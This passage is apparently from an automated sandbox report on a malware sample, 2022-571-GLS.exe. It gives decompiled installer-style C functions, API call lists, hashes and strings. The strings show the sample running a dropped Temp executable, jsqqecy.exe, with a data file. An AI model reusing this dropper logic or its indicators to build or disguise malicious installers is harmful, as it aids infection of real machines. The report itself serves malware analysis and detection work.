                          0x00404a98
                          0x00404a9e
                          0x00404b68
                          0x00404b7b
                          0x00000000
                          0x00404aa4
                          0x00404aa7
                          0x00404aaa
                          0x00404aad
                          0x00404aad
                          0x00404ab3
                          0x00404ab9
                          0x00404abc
                          0x00404ac2
                          0x00404ac3
                          0x00404ac8
                          0x00404ad1
                          0x00404ad8
                          0x00404adb
                          0x00404ade
                          0x00404ae1
                          0x00404b1b
                          0x00404b1d
                          0x00404b46
                          0x00404b1f
                          0x00404b2c
                          0x00404b2c
                          0x00404ae3
                          0x00404ae6
                          0x00404af5
                          0x00404aff
                          0x00404b07
                          0x00404b0e
                          0x00404b16
                          0x00404b16
                          0x00404ae1
                          0x00404b4c
                          0x00404b4d
                          0x00404b53
                          0x00404b59
                          0x00404b59
                          0x00404b66
                          0x00404b81
                          0x00404b85
                          0x00404ba2
                          0x00404ba7
                          0x00404baa
                          0x00404baa
                          0x00000000
                          0x00404b87
                          0x00404b8c
                          0x00404b95
                          0x00404f22
                          0x00404f34
                          0x00404f34
                          0x00404b85
                          0x00000000
                          0x00404b66
                          0x00404a9e

                          APIs
                          • GetDlgItem.USER32 ref: 0040494D
                          • GetDlgItem.USER32 ref: 0040495A
                          • GlobalAlloc.KERNEL32(00000040,00000003), ref: 004049A6
                          • LoadBitmapA.USER32 ref: 004049B9
                          • SetWindowLongA.USER32 ref: 004049D3
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E7
                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004049FB
                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A10
                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A1C
                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A2E
                          • DeleteObject.GDI32(?), ref: 00404A33
                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A5E
                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A6A
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AFF
                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B2A
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B3E
                          • GetWindowLongA.USER32 ref: 00404B6D
                          • SetWindowLongA.USER32 ref: 00404B7B
                          • ShowWindow.USER32(?,00000005), ref: 00404B8C
                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C8F
                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF4
                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D09
                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D2D
                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D53
                          • ImageList_Destroy.COMCTL32(?), ref: 00404D68
                          • GlobalFree.KERNEL32 ref: 00404D78
                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DE8
                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404E91
                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA0
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC0
                          • ShowWindow.USER32(?,00000000), ref: 00404F0E
                          • GetDlgItem.USER32 ref: 00404F19
                          • ShowWindow.USER32(00000000), ref: 00404F20
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 1638840714-813528018
                          • Opcode ID: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                          • Instruction ID: 18330f5bf3a72d7674edbcfa030aeaae95a9b0ee0e7fe2e829f5852d3ce9e096
                          • Opcode Fuzzy Hash: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                          • Instruction Fuzzy Hash: AE029DB0E00209AFDB21CF55DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004043F5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E004043F5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd50;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004055A0(0x3fb, _t146);
					E00405F5D(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004055A0(0x3fb, _t146);
							if(E004058CF(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405CFB(0x41f548, _t146);
							_t87 = E00406087(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405CFB(0x41f548, _t146);
								_t89 = E00405882(0x41f548);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f548,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f548) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f548,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405835(0x41f548) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f548) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404889(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42375c; // 0x5c191b
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404871(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f538);
									} else {
										E004047AC(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424024 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403FD9(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42056c == _t158) {
									E0040438A();
								}
								 *0x42056c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420580;
							_v60 = E00404746;
							_v56 = _t146;
							_v68 = E00405D1D(_t146, 0x420580, _t166, 0x41f950, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057EE(_t146);
								_t124 =  *0x423f90; // 0x5bf9f8
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405D1D(_t146, 0x420580, _t166, 0, _t125);
									if(lstrcmpiA(0x422f20, 0x420580) != 0) {
										lstrcatA(_t146, 0x422f20);
									}
								}
								 *0x42056c =  *0x42056c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040585B(_t146) != 0 && E00405882(_t146) == 0) {
						E004057EE(_t146);
					}
					 *0x423758 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403FB7(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403FB7(_t166);
					E00403FEC(_t165);
					_t138 = E00406087(0xa);
					if(_t138 == 0) {
						L53:
						return E0040401E(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                          0x004043f5
                          0x004043fb
                          0x00404401
                          0x0040440e
                          0x0040441c
                          0x0040441f
                          0x00404427
                          0x0040442d
                          0x0040442d
                          0x00404439
                          0x0040443c
                          0x004044aa
                          0x004044b1
                          0x00404588
                          0x0040458f
                          0x0040459e
                          0x0040459e
                          0x004045a2
                          0x004045ac
                          0x004045b9
                          0x004045bb
                          0x004045bb
                          0x004045c9
                          0x004045d0
                          0x004045d7
                          0x004045da
                          0x00404611
                          0x00404613
                          0x00404619
                          0x0040461e
                          0x00404622
                          0x00404624
                          0x00404624
                          0x00404640
                          0x00000000
                          0x00404642
                          0x00404645
                          0x00404653
                          0x00404659
                          0x0040465a
                          0x0040465d
                          0x00404660
                          0x00000000
                          0x00404660
                          0x004045dc
                          0x004045de
                          0x004045e2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004045e4
                          0x004045e4
                          0x004045f1
                          0x004045f6
                          0x00000000
                          0x00000000
                          0x004045fa
                          0x004045fc
                          0x004045fc
                          0x00404607
                          0x0040460a
                          0x0040460f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040460f
                          0x0040466c
                          0x00404676
                          0x00404679
                          0x0040467c
                          0x00404683
                          0x00404683
                          0x00404685
                          0x00404685
                          0x0040468a
                          0x0040468c
                          0x00404694
                          0x0040469b
                          0x0040469d
                          0x004046a8
                          0x004046a8
                          0x0040469d
                          0x004046af
                          0x004046b8
                          0x004046c2
                          0x004046ca
                          0x004046e5
                          0x004046cc
                          0x004046d5
                          0x004046d5
                          0x004046ca
                          0x004046ea
                          0x004046ef
                          0x004046f4
                          0x004046fd
                          0x004046fd
                          0x00404706
                          0x00404708
                          0x00404708
                          0x00404714
                          0x0040471c
                          0x00404726
                          0x00404726
                          0x0040472b
                          0x00000000
                          0x0040472b
                          0x004045da
                          0x00404591
                          0x00404598
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404598
                          0x004044b7
                          0x004044c0
                          0x004044da
                          0x004044df
                          0x004044e9
                          0x004044f0
                          0x004044fc
                          0x004044ff
                          0x00404502
                          0x00404509
                          0x00404511
                          0x00404514
                          0x00404518
                          0x0040451f
                          0x00404527
                          0x00404581
                          0x00404529
                          0x0040452a
                          0x00404531
                          0x00404536
                          0x0040453b
                          0x00404543
                          0x00404550
                          0x00404564
                          0x00404568
                          0x00404568
                          0x00404564
                          0x0040456d
                          0x0040457a
                          0x0040457a
                          0x00404527
                          0x00000000
                          0x004044df
                          0x004044cd
                          0x00000000
                          0x00000000
                          0x004044d3
                          0x00000000
                          0x0040443e
                          0x0040444b
                          0x00404454
                          0x00404461
                          0x00404461
                          0x00404468
                          0x0040446e
                          0x00404477
                          0x0040447a
                          0x0040447d
                          0x00404485
                          0x00404488
                          0x0040448b
                          0x00404491
                          0x00404498
                          0x0040449f
                          0x00404731
                          0x00404743
                          0x004044a5
                          0x004044a8
                          0x00000000
                          0x004044a8
                          0x0040449f

                          APIs
                          • GetDlgItem.USER32 ref: 00404444
                          • SetWindowTextA.USER32(00000000,?), ref: 0040446E
                          • SHBrowseForFolderA.SHELL32(?,0041F950,?), ref: 0040451F
                          • CoTaskMemFree.OLE32(00000000), ref: 0040452A
                          • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,00420580,00000000,?,?), ref: 0040455C
                          • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up), ref: 00404568
                          • SetDlgItemTextA.USER32 ref: 0040457A
                            • Part of subcall function 004055A0: GetDlgItemTextA.USER32 ref: 004055B3
                            • Part of subcall function 00405F5D: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\2022-571-GLS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                            • Part of subcall function 00405F5D: CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                            • Part of subcall function 00405F5D: CharNextA.USER32(?,"C:\Users\user\Desktop\2022-571-GLS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                            • Part of subcall function 00405F5D: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                          • GetDiskFreeSpaceA.KERNEL32(0041F548,?,?,0000040F,?,0041F548,0041F548,?,00000001,0041F548,?,?,000003FB,?), ref: 00404638
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404653
                            • Part of subcall function 004047AC: lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                            • Part of subcall function 004047AC: wsprintfA.USER32 ref: 00404852
                            • Part of subcall function 004047AC: SetDlgItemTextA.USER32 ref: 00404865
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up$A$C:\Users\user\AppData\Local\Temp
                          • API String ID: 2624150263-85621427
                          • Opcode ID: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                          • Instruction ID: 04579f169ebad34731529ea4dd061e989e150d10634133a65e55446a4c87498a
                          • Opcode Fuzzy Hash: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                          • Instruction Fuzzy Hash: A5A17EB1900209ABDB11EFA1CC45AAF77B8EF85355F10843BFA01B62D1D77C9A418F69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
				_t96 = E00402A0C(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
				if(E0040585B(_t96) == 0) {
					E00402A0C(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409448, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409448, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                          0x0040203f
                          0x00402049
                          0x00402052
                          0x0040205c
                          0x00402065
                          0x0040206f
                          0x00402073
                          0x00402073
                          0x00402078
                          0x00402089
                          0x00402091
                          0x00402171
                          0x00402171
                          0x00402178
                          0x00402097
                          0x00402097
                          0x004020a8
                          0x004020ac
                          0x004020b2
                          0x004020bc
                          0x004020be
                          0x004020c9
                          0x004020cc
                          0x004020d9
                          0x004020db
                          0x004020dd
                          0x004020e4
                          0x004020e7
                          0x004020e7
                          0x004020ea
                          0x004020f4
                          0x004020fc
                          0x00402101
                          0x0040210d
                          0x0040210d
                          0x00402110
                          0x00402119
                          0x0040211c
                          0x00402125
                          0x0040212a
                          0x0040213c
                          0x0040214b
                          0x0040214d
                          0x00402159
                          0x00402159
                          0x0040214b
                          0x0040215b
                          0x00402161
                          0x00402161
                          0x00402164
                          0x0040216a
                          0x0040216f
                          0x00402184
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040216f
                          0x0040217a
                          0x004028a4
                          0x004028b0

                          APIs
                          • CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409448,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 004020C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 123533781-47812868
                          • Opcode ID: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                          • Instruction ID: 2bdc35c2d2963d88c22d289f5388ef8df5706d1624f03911357c3292c4b85553
                          • Opcode Fuzzy Hash: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                          • Instruction Fuzzy Hash: B2416275A00204BFDB00EFA4CD89E9E7BB6EF49314B20416AF905EB2D1CA79DD41CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402654 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E00402654(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
					E00405C59(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405CFB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                          0x0040266c
                          0x00402680
                          0x0040268b
                          0x0040268c
                          0x004027c7
                          0x0040266e
                          0x0040266e
                          0x00402670
                          0x00402672
                          0x00402672
                          0x004028a4
                          0x004028b0

                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                          • Instruction ID: 2317ffd169cfaf4cb587e6187c2204c3bd1190871e25379d9522107c79eb17b9
                          • Opcode Fuzzy Hash: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                          • Instruction Fuzzy Hash: 3AF0A732508100DAD710E7B49949AEEB368EF51328F60457BE505F20C1C6B84945DB2E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403AE4 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E00403AE4(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420564 = _t35;
					if(_t115 == 0x110) {
						 *0x423f88 = _t125;
						 *0x420578 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f540 = _t91;
						E00403FB7(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423768);
						 *0x42374c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420564 = 1;
					}
					_t122 =  *0x4091e8; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423fa0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00404003(0x40b);
						while(1) {
							_t37 =  *0x420564;
							 *0x4091e8 =  *0x4091e8 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091e8; // 0xffffffff
							__eflags = _t39 -  *0x423fa4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42374c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423fa4; // 0x2
							__eflags =  *0x4091e8 - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D1D(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403FB7(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42400c - _t133;
							_v32 = _t49;
							if( *0x42400c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
